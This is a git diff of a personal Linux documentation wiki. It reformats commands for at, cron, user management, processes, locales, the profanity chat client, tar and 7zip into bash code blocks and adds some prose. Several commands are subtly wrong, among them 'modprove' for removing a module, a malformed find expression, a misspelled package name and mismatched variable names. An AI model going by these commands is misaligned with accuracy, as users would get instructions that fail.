diff --git a/basics/at.md b/basics/at.md index c385d49..00b67bd 100644 --- a/basics/at.md +++ b/basics/at.md @@ -4,29 +4,45 @@ tags: [ "Documentation", "Basics" ] --- Install with: -> sudo apt install at +```bash +sudo apt install at +``` Enable the daemon service with: -> sudo systemctl enable --now atd +```bash +sudo systemctl enable --now atd +``` Then jobs can be specified with absolute time, such as: -> at 16:20 +```bash +at 16:20 +``` -> at noon +```bash +at noon +``` -> at midnight +```bash +at midnight +``` -> at teatime +```bash +at teatime +``` Type in your command, e.g.: -> touch /tmp/myFile.txt +```bash +touch /tmp/$FILE.txt +``` The jobs can also be specified relative to the current time: -> at now +15 minutes +```bash +at now +15 minutes +``` Finally, accept the jobs with ^D. @@ -34,15 +50,19 @@ Finally, accept the jobs with ^D. Display a list of commands to run with: -> atq +```bash +atq +``` -`2 Sat Oct 20 16:00:00 2018 a roach-1` +> 2 Sat Oct 20 16:00:00 2018 a roach-1 This will print all pending IDs. Remove a job by the ID with: -> atrm 2 +```bash +atrm 2 +``` -Check /var/spool/atd/ +Check `/var/spool/atd/` to see the jobs. ![At it again](/tapes/at.gif) @@ -50,10 +70,10 @@ Check /var/spool/atd/ Automatically add a job for later, by setting the date, then using echo for the command. -> t="$(date -d "2 minutes" +%R)" - -> echo "fortune > ~/file" | at "$t" - -> watch cat file +```bash +t="$(date -d "2 minutes" +%R)" +echo "fortune > ~/$FILE" | at "$t" +watch cat $FILE +``` The `$t` here outputs the day in minutes, but you could also do `t="$(date -d "2 days" +%m/%d/%Y)"`. diff --git a/basics/basics.md b/basics/basics.md index 5f6c444..e744d3d 100644 --- a/basics/basics.md +++ b/basics/basics.md @@ -9,91 +9,136 @@ Don't worry about understanding any of it, just type it in and the habit forms p You start in a dark room. You want to know where you are by **p**rinting out your **w**orking '**d**irectory' (i.e. 'location'): -> pwd +```bash +pwd +``` Have a look at what is here: -> ls +```bash +ls +``` If you get no response, the list of items is "", meaning "nothing here". Have a look at **a**ll the files: -> ls -a +```bash +ls -a +``` -`. ..` +```bash +. .. +``` So `.` means 'here' and `..` means 'you see stairs leading downwards' (e.g. 'the directory behind you'). Change directory (`cd`) down one level: -> cd .. +```bash +cd .. +``` Look where you are again with `pwd`, then go back up. Use `ls`, and if you see `bob`, then: -> cd bob +```bash +cd bob +``` Move around the directories. The place at the bottom is the 'root', and is known as `/`. Go to the root: -> cd / +```bash +cd / +``` -Do `ls` again and change into `etc`. Look at how much space those folders are taking up: +Do `ls` again and `cd` into `etc`. Look at how much space those folders are taking up: -> du iptables +```bash +du iptables +``` +That's the number of kilobytes the file is taking up. +Do the same again, but in a human-readable format: -That's the number of kilobytes the file is taking up. Do the same again, but in a human-readable format: +```bash +du -h iptables +``` -> du -h iptables +The `du` program has `-h` for 'human', '-s' for 'short', and a bunch of other commands. +Have a look at the manual and try another command: -The `du` program has `-h` for 'human', '-s' for 'short', and a bunch of other commands. Have a look at the manual and try another command: - -> man du +```bash +man du +``` Once you're done, press 'q' to quit the manual page and try the extra `du` flag you've found. Now you can try to gain super-powers and take over the system: -> sudo -i +```bash +sudo -i +``` -At this point, you are 'root'. All your commands will be executed, even if they're unsafe, or even if you ask to delete the entire machine. Best to exit out of the root account: +At this point, you are 'root'. +All your commands will be executed, even if they're unsafe, or even if you ask to delete the entire machine. +Best to exit out of the root account: -> exit +```bash +exit +``` Go find a file that isn't a directory. You can tell which is which with: -> ls -l +```bash +ls -l +``` A directory starts with a 'd', like this: -`drwxr-xr-x 79 root root 4096 Jan 3 05:15 /etc/` +```bash +drwxr-xr-x 79 root root 4096 Jan 3 05:15 /etc/ +``` A standard file starts with '-', like this: +```bash `-rw-r--r-- 1 root root 8 Dec 11 17:26 hostname` +``` Look inside the file /etc/hostname to find out your computer's name: -> cat /etc/hostname +```bash +cat /etc/hostname +``` Print out the words "hello world": -> echo "hello world" +```bash +echo "hello world" +``` Move back to your home directory: -> cd +```bash +cd +``` Take the words 'hello world', and put them in 'my_file': -> echo 'hello world' > my_file +```bash +echo 'hello world' > my_file +``` Measure the disk usage of that file, then put the results at the bottom of the file: -> du my_file >> my_file +```bash +du $FILE >> $FILE +``` And check the results: -> cat my_file +```bash +cat $FILE +``` # Autocompletion @@ -103,50 +148,70 @@ Press tab after typing a few keys and bash will guess what you're trying to typ Look at your file's owner: -> ls -l my_file +```bash +ls -l $FILE +``` If it says `-rw-r--r-- 1 root root 8 Dec 11 17:26 hostname` then the file is owned by 'root'. Take your file and change the owner to root: -> sudo chown root my_file +```bash +sudo chown root $FILE +``` Change the same file so it's owned by the group 'audio': -> sudo chown :audio my_file +```bash +sudo chown :audio $FILE +``` Check you did that correctly: -> ls -l my_file +```bash +ls -l my_file +``` -`-rw-r--r-- 1 root audio 0 Jan 3 19:20 my_file` +> -rw-r--r-- 1 root audio 0 Jan 3 19:20 my_file Read the start of that line. Root can 'read' and 'write' to or delete the file. Try to remove (delete) it: -> rm my_file +```bash +rm $FILE +``` You'll see you're not allowed, because you don't own it. Look at which groups you're in: -> groups +```bash +groups +``` Change the file so that members of the audio group can write to the file: -> sudo chmod g+w my_file +```bash +sudo chmod g+w $FILE +``` Check you got it right with `ls -l`: -> -rw-rw-r-- 1 root audio 0 Jan 3 19:20 my_file +```bash +-rw-rw-r-- 1 root audio 0 Jan 3 19:20 my_file +``` Try to delete the file again: -> rm my_file +```bash +rm my_file +``` If you can't, you're not in the audio group. Add yourself. You'll need to *modify* your *user account*, by **a**ppending 'audio' to your list of groups. Use `-a` to **a**ppend, and `-G`, to say you're modifying groups: -> sudo usermod -a -G audio [ your username here ] +```bash +sudo usermod -a -G audio [ your username here ] +``` Now you should be able to remove (delete) the file. Remember, that using 'rm file' will not send it to a recycling bin. The file is gone. @@ -154,59 +219,83 @@ Now you should be able to remove (delete) the file. Remember, that using 'rm fi Make a directory called 'new test': -> mkdir 'new test' +```bash +mkdir 'new test' +``` Make two directories, called 'A', and 'Z': -> mkdir A Z +```bash +mkdir A Z +``` Make a single directory called 'A Z' -> mkdir 'A Z' +```bash +mkdir 'A Z' +``` # Text Searches Measure the disk usage of everything ('\*' means 'everything'), and put it in a file called 'disk usage.txt': -> du -sch * > A/'disk usage'.txt +```bash +du -sch * > A/'disk usage'.txt +``` Look at your file: -> cat A/'disk usage.txt' +```bash +cat A/'disk usage.txt' +``` If you think you have too much information, use `grep` to just get the one line of text you want: -> grep total A/disk\ usage.txt +```bash +grep total A/disk\ usage.txt +``` The `grep` program also has a manual ('man page'). You should find out what that `-c` flag does, but the manual is too long to read. Start the manual: -> man du +```bash +man du +``` Then search for `-c` by pressing `/`. Your final keys should be `man du`, then `/-c` Find out if the `ls` program also has a 'human readable' format by using `grep` to search for the word 'human': -> man ls | grep human +```bash +man ls | grep human +``` Now use that flag that you've found in combinatin with the `-l` flag to look at a file. Remove the directory 'Z': -> rmdir Z +```bash +rmdir Z +``` Remove the directory 'Z': -> rmdir Z +```bash +rmdir Z +``` And then remove all the rest: -> rmdir * +```bash +rmdir * +``` The 'A' directory will not budge because it's not empty. Remove it recursively, so the computer will remove the things inside the directory as well as the directory itself: -> rm -r A +```bash +rm -r A +``` # Installation @@ -214,34 +303,48 @@ You get a package manager which installs programs, fonts, et c. If you're on something like Debian, you'll have `apt`, or if you're on something like Red Hat, you'll have `yum`. If unsure, ask where a program is: -> whereis yum +```bash +whereis yum +``` -> whereis apt +```bash +whereis apt +``` If you get a hit, you can use whatever program that is to install things. Set a reminder of your package manager: -> echo my package manager is yum | lolcat +```bash +echo my package manager is yum | lolcat +``` If that failed it's because you don't have `lolcat` installed. Install lolcat: -> sudo apt install lolcat +```bash +sudo apt install lolcat +``` Try the same command again. Search for things you want, like `libreoffice`, or `gimp`: -> apt search libreoffice +```bash +apt search libreoffice +``` ... then install one of them with: -> apt install [ thing ] +```bash +apt install $PROGRAM +``` Remove `lolcat`, because it's useless: -> sudo apt remove lolcat +```bash +sudo apt remove lolcat +``` ... and that's pretty much it. You can move, create, destroy, install things, and look things up. diff --git a/basics/clock.md b/basics/clock.md index 00096a2..6397141 100644 --- a/basics/clock.md +++ b/basics/clock.md @@ -5,27 +5,39 @@ tags: [ "Documentation", "Basics" ] Show system time: -> date +```bash +date +``` Show hardware time: -> sudo hwclock -r +```bash +sudo hwclock -r +``` Change system time to match hardware time: -> sudo hwclock --hctosys +```bash +sudo hwclock --hctosys +``` Change hardware time to match system time: -> sudo hwclock --systohc +```bash +sudo hwclock --systohc +``` Manually set the hardware time to a specified date: -> sudo hwclock --set --date="8/25/19 13:30:00" +```bash +sudo hwclock --set --date="8/25/19 13:30:00" +``` ## Normal Date -> date +%d/%m/%y +```bash +date +%d/%m/%y +``` # Unix Time @@ -33,7 +45,9 @@ Computers started counting time on January 1st, 1970, and added one second-per-s Track the time in Unix-time: -> date +%s +```bash +date +%s +``` # Network Time Providers @@ -41,9 +55,13 @@ Servers which take their time from an observatory we call Stratum 1 servers. Se Install ntp with: -> sudo apt-get install -y ntp +```bash +sudo apt-get install -y ntp +``` The shell command for this is `ntpq`. Monitor the service providers using: -> ntpq -p +```bash +ntpq -p +``` diff --git a/basics/conditionals.md b/basics/conditionals.md index 53681d0..d900a47 100644 --- a/basics/conditionals.md +++ b/basics/conditionals.md @@ -41,29 +41,28 @@ case $CRE in owlbears | monsters ) echo "Really you're a wizard fan" ;; esac +``` # While and Until This prints from 1 until 9. -> COUNTER=1 - -> while [ $COUNTER -lt 2 ]; do - +```bash +COUNTER=1 +while [ $COUNTER -lt 2 ]; do > ((COUNTER++)) - > echo $COUNTER - > done - ``` There's also 'until', which stops when something is true, rather than keeping going when something is true. # For -> for i in $( ls ); do +```bash +for i in $( ls ); do > du -sh $i > done +``` # Sequences @@ -71,13 +70,19 @@ The sequences tool counts up from X in jumps of Y to number Z. Count from 1 to 10. -> seq 10 +```bash +seq 10 +``` Count from 4 to 11. -> seq 4 11 +```bash +seq 4 11 +``` Count from 1 to 100 in steps of 5. -> seq 1 5 100 +```bash +seq 1 5 100 +``` diff --git a/basics/cron.md b/basics/cron.md index 7f3bbc5..2983cab 100644 --- a/basics/cron.md +++ b/basics/cron.md @@ -6,24 +6,29 @@ tags: [ "Documentation", "Basics" ] The crontab program might have various names, like `cronie` or `crond`. -> sudo apt search -n ^cron +```bash +sudo apt search -n ^cron +``` Once installed, search for the service name, and start it. -> sudo systemctl list-unit-files | grep cron +```bash +sudo systemctl list-unit-files | grep cron +``` -> sudo systemctl enable --now cron +```bash +sudo systemctl enable --now cron +``` You can *e*dit your crontab with: -> crontab -e - - +```bash +crontab -e ``` -39 */3 * * * /usr/bin/updatedb -``` +> 39 */3 * * * /usr/bin/updatedb + ## Syntax `* * * * *` @@ -34,29 +39,33 @@ These five points refer to: So '3pm every Sunday' would be: -`0 15 * * 7` +> 0 15 * * 7 Here 'Sunday' is indicated by "7", and '3pm' is 'the 15th hour'. The minute is '0' (i.e. '0 minutes past three pm'). Doing the same thing, but only in February, would be: -`0 15 * 2 7` +> 0 15 * 2 7 ### Full Paths Executing something requires the full path to where it is, so you cannot simply use `apt update -y`, because cron does not know where `apt` is. Instead, find out where it is: -> type -P apt +```bash +type -P apt +``` `/usr/bin/apt` Then put that into the crontab: -> sudo crontab -e +```bash +sudo crontab -e +``` -`40 */3 * * * /usr/bin/apt update -y` +> 40 */3 * * * /usr/bin/apt update -y This will run `apt update -y` as root every 3 hours, at 40 minutes past the hour, e.g. 00:40, 03:40, 06:40. @@ -65,13 +74,17 @@ This will run `apt update -y` as root every 3 hours, at 40 minutes past the hour You can execute a script as root by putting it into a directory, instead of in the tab. Look at the available cron directories: -> ls /etc/cron.\* +```bash +ls /etc/cron.\* +``` ### Testing with runparts Run-parts runs all executable scripts in a directory. -> run-parts /etc/cron.hourly +```bash +run-parts /etc/cron.hourly +``` ## Tips @@ -84,12 +97,16 @@ First add `HOME=/home/user`, then you can use syntax like this: *Remember to test the script by executing that line first*: -> $HOME/.scripts/myScript.sh +```bash +$HOME/.scripts/myScript.sh +``` You can also add your regular path to your crontab as a variable (see example below). If you're using vim as the editor, just run this at the top of your crontab: -> :r!echo PATH=$PATH +```bash +:r!echo PATH=$PATH +``` ### `date` Commands diff --git a/basics/kernel.md b/basics/kernel.md index d29f37c..43432af 100644 --- a/basics/kernel.md +++ b/basics/kernel.md @@ -10,17 +10,25 @@ Kernel modules live in lib/modules/$(uname -r) Load them with -> sudo modprobe ath9k +```bash +sudo modprobe ath9k +``` Or remove one with -> sudo modprove uvcvideo +```bash +sudo modprove uvcvideo +``` The PC's irritating speaker beep can be really annoying. Disable it with: -> sudo modprobe -r pcspeaker +```bash +sudo modprobe -r pcspeaker +``` Permanently disable a module by blacklisting it in `/etc/modprobe.d`: -> echo 'blacklist pcspkr' > /etc/modprobe.d/*nobeep*.conf +```bash +echo 'blacklist pcspkr' > /etc/modprobe.d/*nobeep*.conf +``` diff --git a/basics/kill.md b/basics/kill.md index a68c478..8f0c805 100644 --- a/basics/kill.md +++ b/basics/kill.md @@ -7,7 +7,9 @@ If you want to kill a program in a graphical environment, open a terminal and ty # Graphical Programs -> xkill +```bash +xkill +``` Then click on the application which you want to kill. @@ -15,23 +17,31 @@ Then click on the application which you want to kill. To kill a program, find it with: -> pgrep discord +```bash +pgrep discord +``` This will give you the UUID, e.g. `19643`. Kill the program with: -> kill 19643 +```bash +kill 19643 +``` # Types of Kill To see an ordered list of termination signals: -> kill -l +```bash +kill -l +``` - 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP - 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1 -11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM +> 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP + +> 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1 + +> 11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM You can select these levels with a '- number'. @@ -39,18 +49,24 @@ Higher numbers are roughly equivalent to insistence. For example: -> kill -1 3498 +```bash +kill -1 3498 +``` This roughly means 'maybe stop the program, if you can, maybe reload'. Or the famous: -> kill -9 3298 +```bash +kill -9 3298 +``` This means 'kill the program dead, now, no questions, dead'. **Beware** - if Firefox starts another program to connect to the internet, and you `kill -9 firefox`, this will leave all of Firefox's internet connection programs ("children") still there, but dead and useless. +# Sobriquets + - A dead program which sits there doing nothing is known as a 'zombie'. - A program which is run by another program is called a 'child program'. - A child whose parent program is dead is called an 'orphan'. diff --git a/basics/links.md b/basics/links.md index 4b39a46..3c5d028 100644 --- a/basics/links.md +++ b/basics/links.md @@ -4,12 +4,16 @@ tags: [ "Documentation", "Basics" ] --- Link from X to Y. -> ln -s X ../otherdir/Y +```bash +ln -s X ../otherdir/Y +``` If you want a hard link, this will make a single file exist in two locations. If it is deleted in one location, it continues to exist in the other. -> ln *X* *Y* +```bash +ln *X* *Y* +``` Both files must be on the same hard drive, as they have the same inode (check this with `ls -i file`). diff --git a/basics/locale.md b/basics/locale.md index a63a390..69572b5 100644 --- a/basics/locale.md +++ b/basics/locale.md @@ -3,29 +3,40 @@ title: "locale" tags: [ "Documentation", "Basics" ] --- +Your locale tells the computer your location, preferred time-and-date format, standard language, papersize, et c. A list of supported locales is available at /usr/share/i18n/SUPPORTED See a full list with: -> cat /usr/share/i18n/SUPPORTED +```bash +cat /usr/share/i18n/SUPPORTED +``` Take the first portion to generate full locale information for a region: -> locale-gen ru_RU.UTF-8 +```bash +locale-gen ru_RU.UTF-8 +``` Then use this for the current shell session with -> LANG=ru_RU.utf8 +```bash +LANG=ru_RU.utf8 +``` Expand this to the entire system with: -> export LANG=ru_RU.utf8 +```bash +export LANG=ru_RU.utf8 +``` You can make this permanent for one user by adding this line to the ~/.profile or ~/.bashrc. Make it permanent for the entire system by editing: -> sudo vim /etc/defaults/locale +```bash +sudo vim /etc/defaults/locale +``` # Variables diff --git a/basics/locating.md b/basics/locating.md index 0fe52c8..9d76598 100644 --- a/basics/locating.md +++ b/basics/locating.md @@ -6,7 +6,9 @@ tags: [ "Documentation", "Basics" ] `type` shows what kind of thing you're running, be it an alias, function, or binary program. -> type cmus +```bash +type cmus +``` ![where is cmus?](/tapes/which.gif) @@ -18,18 +20,24 @@ Ask where the `angband` program is, along with all its configuration files: Also `which` shows where a binary file (the program) is, -> which cmus +```bash +which cmus +``` # Quick Search for Files You'll need to set up `locate` for this by installing `mlocate`. `mlocate` needs a list of all files on the machine, so run: -> sudo updatedb +```bash +sudo updatedb +``` Then to find a file called 'my-cats.jpg', run: -> locate cats +```bash +locate cats +``` For best results, run `updatedb` regularly, perhaps in crontab. diff --git a/basics/processes.md b/basics/processes.md index ba7ac40..9d373a6 100644 --- a/basics/processes.md +++ b/basics/processes.md @@ -6,23 +6,33 @@ tags: [ "Documentation", "Basics" ] See running items in current terminal with -> ps +```bash +ps +``` or more with -> ps -a +```bash +ps -a +``` Or the entire system with -> ps -e +```bash +ps -e +``` Or the entire system with more information, BSD style, with: -> ps aux +```bash +ps aux +``` And then search for a particular program with -> ps aux | grep cmus +```bash +ps aux | grep cmus +``` # Jobs @@ -30,15 +40,21 @@ Pause a job with ^z. Put it in the background with the '&' suffix. List jobs in the current shell with -> jobs +```bash +jobs +``` And then you can pull number 1 up again with -> fg 1 +```bash +fg 1 +``` Or continue running a stopped job with: -> bg 1 +```bash +bg 1 +``` # Nice @@ -46,21 +62,31 @@ This changes how nice a program is, from -20 to 19. Install a program, but nicely, at nice value '10': -> nice -10 sudo apt -y install libreoffice +```bash +nice -10 sudo apt -y install libreoffice +``` Aggressively use Steam, with a nice value of '-13'. -> nice --13 steam& +```bash +nice --13 steam& +``` Find out that Steam's fucking everything up, so you change its nice value with 'renice': -> renice --5 -p 3781 +```bash +renice --5 -p 3781 +``` Nerf all of roach-1's processes: -> renice 10 -u roach-1 +```bash +renice 10 -u roach-1 +``` ... or the entire group -> renice -14 -g hackers +```bash +renice -14 -g hackers +``` diff --git a/basics/time.md b/basics/time.md index 47b3a2f..a69a4fe 100644 --- a/basics/time.md +++ b/basics/time.md @@ -6,7 +6,9 @@ tags: [ "Documentation", "Basics" ] Set time to synchronize with an ntp server: -> timedatectl set-ntp true +```bash +timedatectl set-ntp true +``` This info stays in `/usr/share/zoneinfo`. @@ -16,7 +18,9 @@ Local time is kept in /etc/localtime. According to Dave's LPIC guide, you can set the local time by making asymboling link from your timezone to /etc/localtime, as so: -> sudo ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime +```bash +sudo ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime +``` ...however this produced the wrong time for me. Further, /etc/localtime produces an output with cat, while the zoneinfo files do not. @@ -24,23 +28,33 @@ According to Dave's LPIC guide, you can set the local time by making asymboling See local time, language and character settings with: -> locale +```bash +locale +``` List available locales with: -> locale -a +```bash +locale -a +``` To see additional locales which are available (but not necessarily installed): -> cat /usr/share/i18n/SUPPORTED +```bash +cat /usr/share/i18n/SUPPORTED +``` Set a supported locale with: -> locale-gen pl_PL.UTF-8 +```bash +locale-gen pl_PL.UTF-8 +``` Then set that language, with: -> LANG=pl_PL.UTF-8 +```bash +LANG=pl_PL.UTF-8 +``` ... then reboot. @@ -48,7 +62,9 @@ Then set that language, with: Glimpse an overview with: -> ntpq -p +```bash +ntpq -p +``` Usually this is run as a service, so just start that service. diff --git a/basics/users.md b/basics/users.md index d8c2eb2..3c09172 100644 --- a/basics/users.md +++ b/basics/users.md @@ -6,91 +6,133 @@ tags: [ "Documentation", "Basics" ] Let's get some entries with 'getent', e.g. passwd or group. -> getent passwd +```bash +getent passwd +``` -> getent group +```bash +getent group +``` Obviously: -> getent shadow +```bash +getent shadow +``` ## Examples -> sudo adduser maestro +```bash +sudo adduser maestro +``` add user 'maestro' This depends upon the settings in the /etc/default/useradd file and /etc/login.defs -> sudo useradd -m pinkie +```bash +sudo useradd -m pinkie +``` add user 'pinkie' with a home directory -> sudo adduser -m -e 2017-04-25 temp +```bash +sudo adduser -m -e 2017-04-25 temp +``` add expiry date to user -> userdel maestro +```bash +userdel maestro +``` delete maestro -> userdel -r maestro +```bash +userdel -r maestro +``` delete maestro and hir homefolder -> groups +```bash +groups +``` find which group you are in -> id +```bash +id +``` same -> id -Gn maestro +```bash +id -Gn maestro +``` Find which groups maestro is in -> deluser --remove-home maestro +```bash +deluser --remove-home maestro +``` delete user maestro -> usermod -aG sudo maestro +```bash +usermod -aG sudo maestro +``` -add user maestro to group sudo +Add user maestro to group sudo: -> cat /etc/passwd +```bash +cat /etc/passwd +``` list users' passwords (and therefore users) -> groupadd awesome +```bash +groupadd awesome +``` create the group 'awesome' - passwords are stored in /etc/shadow. +Passwords are stored in /etc/shadow. - there are user accounts for processes such as 'bin' and 'nobody' which are locked, so they're unusable. +There are user accounts for processes such as 'bin' and 'nobody' which are locked, so they're unusable. -> passwd -l bin +```bash +passwd -l bin +``` -lock the user 'bin' +Lock the user 'bin'. -> more /etc/passwd | grep games +```bash +more /etc/passwd | grep games +``` we find the name, password and user id of the user 'games'. I.e. the password is 'x', and the user id is '5'. The password is an impossible hash, so no input password could match. -> groupdel learners | delete the group 'learners' +```bash +groupdel learners | delete the group 'learners' +``` -> gpasswd -d pi games | remove user 'pi' from the group 'games' +```bash +gpasswd -d pi games | remove user 'pi' from the group 'games' +``` -> id games +```bash +id games +``` find the id number of group 'games' (60) -> usermod -aG sudo maestro +```bash +usermod -aG sudo maestro +``` add user to group 'maestro' @@ -114,7 +156,9 @@ Alternatively, change the shell in /etc/passwd. Usermod also lets you change a user's username: -> usermod -l henry mark +```bash +usermod -l henry mark +``` However, this will not change the home directory. @@ -126,7 +170,9 @@ usermod -L henry -G or -groups adds the user to other groups: -> usermod -G sudo henry +```bash +usermod -G sudo henry +``` -s adds the user to a shell. @@ -140,45 +186,53 @@ In /etc/group, a group file may look like this: We can use groupmod, like like usermod, e.g. to change a name: -> groupmod -n frontoffice backoffice +```bash +groupmod -n frontoffice backoffice +``` Delte a group: -> groupdel frontoffice +```bash +groupdel frontoffice +``` # Logins See list of logged on users. -> w +```bash +w +``` See last logons: -> last +```bash +last +``` or all logon attempts, including bad attempts: -> lastb +```bash +lastb +``` List recently accessed files: -> last -d +```bash +last -d +``` See files opened by steve -> lsof -t -u steve +```bash +lsof -t -u steve +``` See files opened by anyone but steve -> lsof -u ^steve - -Fuser can also track people loggingin: - -> fuser /var/log/syslog - -... and fuser can kill everything accessing the home directory: - -> fuser -km /home +```bash +lsof -u ^steve +``` # Looking for Dodgy Files @@ -186,21 +240,29 @@ Some files can be executed by people as if they had super user permissions, and Let's start with files executable by user: -> sudo find / -type f -perm -g=s -ls +```bash +sudo find / -type f -perm -g=s -ls +``` And then those executable by the group: -> find / -type f -perm -g=s -ls +```bash +find / -type f -perm -g=s -ls +``` And finally, worrying files, executable by anyone as if sie were the owner: -> find / -xdev \( -o -nogroup \) -print +```bash +find / -xdev \( -o -nogroup \) -print +``` Then have a look at resource usage per user. -#SGID +# SGID -> sudo chmod u+s process.sh +```bash +sudo chmod u+s process.sh +``` This will modify process.sh to that instead of being simply executable, anyone executing it will have the permissions as if owner while executing it. diff --git a/chat/profanity.md b/chat/profanity.md index 6d0a643..951eba2 100644 --- a/chat/profanity.md +++ b/chat/profanity.md @@ -6,23 +6,33 @@ tags: [ "Documentation", "Chat" ] Sign up to an account somewhere. -> /connect bob@bobserver.org +``` +/connect bob@bobserver.org +``` Check if someone wants to be your friend: -> /sub received +``` +/sub received +``` Accept a friend's subscription request: -> /sub add alice@aliceserver.org +``` +/sub add alice@aliceserver.org +``` Join a room: -> /join room1@bobserver.org +``` +/join room1@bobserver.org +``` Save your configuration so you don't have to do this again: -> /save +``` +/save +``` Check your `~/.config/profanity/profrc` for how to data's saved. @@ -30,11 +40,17 @@ Check your `~/.config/profanity/profrc` for how to data's saved. To automatically sign in, add your password to [pass](../data/pass.md). -> /account set *malin@oosm.org* eval_password pass *xmpp* +``` +/account set *malin@oosm.org* eval_password pass *xmpp* +``` -> /autoconnect set *malin@oosm.org* +``` +/autoconnect set *malin@oosm.org* +``` -> /save +``` +/save +``` Remember to save the config for other commands too. @@ -42,7 +58,9 @@ Remember to save the config for other commands too. ## Messages -> /msg alice@aliceserver.org +``` +/msg alice@aliceserver.org +``` This opens in a new tab. Switch tabs with alt+number. @@ -51,75 +69,109 @@ Switch tabs with alt+number. The [docs](https://profanity-im.github.io/guide/0131/reference.html) are massive, so it's often better to use: -> /help +``` +/help +``` ## Editing For long text, you can use vim: -> /executable editor set vim +``` +/executable editor set vim +``` -> /editor +``` +/editor +``` ## Sending & Receiving Files Tell it how to save files: -> /executable urlsave set "wget %u -O %p" +``` +/executable urlsave set "wget %u -O %p" +``` Then get the file with: -> /urlsave ** +``` +/urlsave ** +``` Same for `/urlopen` ## Theme -> profanity +``` +profanity +``` -> /theme list +``` +/theme list +``` -> theme load batman +``` +theme load batman +``` # Encryption ## omemo -> /omemo gen +``` +/omemo gen +``` -> /omemo start +``` +/omemo start +``` You can accept everyone's fingerprint all the time with -> /omemo trustmode firstusage +``` +/omemo trustmode firstusage +``` This will still encrypt, but there will be no check that you have the right person the first time you speak with someone. You can ensure omemo automatcally turns on: -> /omemo policy automatic +``` +/omemo policy automatic +``` ## otr Install libotr-dev or libotr5-dev or whatever.. -> sudo apt -y install lib5otr-dev +``` +sudo apt -y install lib5otr-dev +``` Make your otr keys. -> /otr gen +``` +/otr gen +``` Then you can start an otr converstation. -> /otr start bob@jobbies.org +``` +/otr start bob@jobbies.org +``` Or if you already have a conversation windows open, switch to our using: -> /otr +``` +/otr +``` Finally, verify! -> /otr question "Who are you?" bob +``` +/otr question "Who are you?" bob +``` Bob is verified upon the answer, 'bob'. @@ -127,9 +179,15 @@ Bob is verified upon the answer, 'bob'. Get yours with -> /otr myfp +``` +/otr myfp +``` -> /otr theirfp +``` +/otr theirfp +``` -> /otr myfp +``` +/otr myfp +``` diff --git a/chat/wgetpaste.md b/chat/wgetpaste.md index 06c7439..9d85b5e 100644 --- a/chat/wgetpaste.md +++ b/chat/wgetpaste.md @@ -5,17 +5,25 @@ tags: [ "Documentation", "Chat" ] See available pastebins: -> wgetpaste -S +```bash +wgetpaste -S +``` Upload script.sh to bpaste: -> wgetpaste -s bpaste script.sh +```bash +wgetpaste -s bpaste script.sh +``` Input clipboard to dpaste with the heading "Title" -> wgetpaste -s dpaste -d Title -x +```bash +wgetpaste -s dpaste -d Title -x +``` Paste in the file then load the result to the right-hand clipboard: -> wgetpaste -s dpaste -X +```bash +wgetpaste -s dpaste -X +``` diff --git a/data/backups/archives.md b/data/backups/archives.md index 0613231..e5e5129 100644 --- a/data/backups/archives.md +++ b/data/backups/archives.md @@ -1,26 +1,79 @@ --- -title: "archives" -tags: [ "Documentation", "backups" ] +title: "Archives" +tags: [ "Documentation", "tar", "backups" ] --- -# GPG Archives +# `tar` -Create an encrypted archive with `gpg`: +## Create -> tar czvpf - file1.txt file2.pdf file3.jpg | gpg --symmetric --cipher-algo aes256 -o myarchive.tar.gz.gpg +Combine many files and directories into a single t-archive file. -And extract it with `gpg`: +```bash +tar cf "$ARCHIVE".tar $DIR +``` +You can remember this with the mnemonic '*C*reate *F*ile'. -> gpg -d myarchive.tar.gz.gpg | tar xzvf - +Unfortunately, this stores the full file path, so making a tar archive of `/etc/nginx/` will store `etc/nginx` (without the leading `/`. + +It's often better to tell tar which path to start from using the `-C` flag. + +```bash +tar cf "$ARCHIVE".tar -C /etc/ nginx +``` + +Check the contents of your archive with: + +```bash +tar tf "$ARCHIVE".tar +``` + +If you want to store 'everything in a directory', then using `*` will not work, because it will target everything in the *current* directory. + +Instead, you can store the target in a variable: + +```bash +files=$(ls /etc/nginx) +tar cf "$ARCHIVE".tar -C /etc/nginx/ $file +``` + +## Extract + +Extract the tar archive with + +> tar xf "$ARCHIVE".tar + +You can remember this with the mnemonic 'e*X*tract *F*ile'. + +## Compress + +Create a zip-compressed archive with the `z` flag. + +```bash +tar czf "$ARCHIVE".tgz -C /etc/nginx/ $file +``` + +You can use any file ending you want, but sane people like to use '.tgz' or '.tar.tgz'. # 7zip +(also called 'p7zip' or '7z') + Make archive: -> 7za a -tzip -pPASSWORD -mem=AES256 archive.zip file1 file2 - +```bash +PASSWORD=my_password +``` +```bash +7za a -tzip -p$PASSWORD -mem=AES256 $ARCHIVE.zip $FILE_1 $FILE_2 +``` Note that people can still see every filename in your archive, and can change those files. +They just can't read the contents. Unzip: -> 7za e archive.zip +```bash +7za x archive.zip +``` +7zip will open anything: zip-files, rar-files, a tin of beans, *anything*. +However, the extracted tgz files will just be tar files, so you will still need to use tar to extract them (see above). diff --git a/data/backups/unison.md b/data/backups/unison.md index 7177ef2..e32108d 100644 --- a/data/backups/unison.md +++ b/data/backups/unison.md @@ -5,28 +5,36 @@ tags: [ "Documentation", "Backups" ] Install unison on both machines, and make sure both have the same version of unison, with the same version of the ocaml compiler (the smallest difference will cause problems). -> unison -version +```bash +unison -version +``` Create the `~/.unison` directory on both machines. Make a job called `backup`: -> vim ~/.unison/*backup*.prf - -You can name the file anything, but it must end in .prf. - -Here is an example job, which synchronizes the `~/music` directory with a remote machine. - +```bash +JOB=backup ``` + +Here is an example job, which synchronizes the `~/music` directory with a remote machine which has the same username. + + +```bash +echo " auto = true -root=/home/ghost -root=ssh://ghost@ +root=$HOME +root=ssh://$USER@$IP_ADDRESS/$HOME path=music ignore=Name *.flac +" > ~/.unison/"$JOB".prf ``` + +Remember to specify `$IP_ADDRESS` + The last command means it will ignore any file with a name ending in `.flac`. ## Automatic Runs @@ -34,11 +42,12 @@ The last command means it will ignore any file with a 